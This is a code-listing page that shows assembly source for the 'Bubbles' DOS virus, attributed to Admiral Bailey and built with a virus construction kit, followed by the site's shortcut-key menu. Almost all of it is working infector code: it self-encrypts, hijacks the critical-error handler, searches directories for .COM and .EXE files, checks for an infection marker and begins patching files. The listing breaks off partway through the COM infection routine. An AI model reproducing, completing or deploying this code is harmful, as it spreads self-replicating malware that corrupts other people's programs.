📄 bubbles1.asm
字号:
;---------
; Bubbles Virus written by Admiral Bailey
; Using The Instant Virus Production Kit By Admiral Bailey
; To compile this use TASM /M BUBBLES.ASM
;---------
code segment public 'code'
assume cs:code
org 100h ; All .COM files start here
ID = 'AB' ; Id for infected files
start:
db 0e9h,0,0 ; Jump to the next command
virus:
call realcode ; Push current location on stack
realcode:
nop
nop
nop
nop
nop
pop bp ; Get location off stack
sub bp,offset realcode ; Adjust it for our pointer
nop
nop
nop
nop
call encrypt_decrypt ; Decrypt the virus first
encrypt_start equ $ ; From here is encrypted
cmp sp,id ; COM or EXE?
je restoreEXE
lea si,[bp+offset oldjump] ; Location of old jump in si
mov di,100h ; Location of where to put it in di
push di ; Save so we could just return when done
movsb ; Move a byte
movsw ; Move a word
jmp exitrestore
restoreEXE:
push ds ; Save ExE ds
push es ; Save ExE es
push cs
pop ds ; DS now equals CS
push cs
pop es ; ES now equals CS
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
ExitRestore:
lea dx,[bp+offset dta] ; Where to put New DTA
call set_DTA ; Move it
mov ax,3524h ; Get int 24 handler
int 21h ; To ES:BX
mov word ptr [bp+oldint24],bx ; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
mov ah,47h ; Get the current directory
mov dl,0h ; On current drive
lea si,[bp+offset currentdir] ; Where to keep it
int 21h
dirloop:
lea dx,[bp+offset exefilespec]
call findfirst
lea dx,[bp+offset comfilespec]
call findfirst
lea dx,[bp+offset directory] ; Where to change too '..'
mov ah,3bh ; Change directory
int 21h
jnc dirloop ; If no problems the look for files
mov ah,9 ; Display string
lea dx,[bp+virusname]
int 21h
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; To original
int 21h
push cs
pop ds ; Do this because the DS gets changed
lea dx,[bp+offset currentdir] ; Location Of original dir
mov ah,3bh ; Change to there
int 21h
mov dx,80h ; Location of original DTA
call set_dta ; Put it back there
cmp sp,id-4 ; EXE or COM?
jz returnEXE
retn ; Return to 100h to original jump
ReturnEXE:
pop es ; Get original ES
pop ds ; Get original DS
mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear int's because of stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; Jump ssss:oooo
jmpsave dd ? ; Jump location
stacksave dd ? ; Original cs:ip
jmpsave2 dd 0fff00000h ; Used with carrier file
stacksave2 dd ?
findfirst:
mov ah,4eh ; Find first file
mov cx,7 ; Find all attributes
findnext:
int 21h ; Find first/next file int
jc quit ; If none found then change dir
call infection ; Infect that file
Findnext2:
mov ah,4fh ; Find next file
jmp findnext ; Jump to the loop
quit:
ret
infection:
mov ax,3d00h ; Open file for read only
call open
mov ah,3fh ; Read from file
mov cx,1ah
lea dx,[bp+offset buffer] ; Location to store them
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM' ; EXE?
jz checkEXE ; Why yes, yes it is!
mov ax,word ptr [bp+DTA+35] ; Get end of file name in ax
cmp ax,'DN' ; Does End in comma'ND'? (reverse order)
jz quitinfect ; Yup so get another file
CheckCom:
mov bx,[bp+offset dta+1ah] ; Get file size
mov cx,word ptr [bp+buffer+1] ; Get jump loc of file
add cx,eof-virus+3 ; Add for virus size
cmp bx,cx ; Does file size=file jump+virus size
jz quitinfect ; Yup then get another file
jmp infectcom
CheckExe:
cmp word ptr [bp+buffer+10h],id ; Check EXE for infection
jz quitinfect ; Already infected so close up
jmp infectexe
quitinfect:
ret
InfectCom:
sub bx,3 ; Adjust for new jump
lea si,[bp+buffer]
lea di,[bp+oldjump]
movsw
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -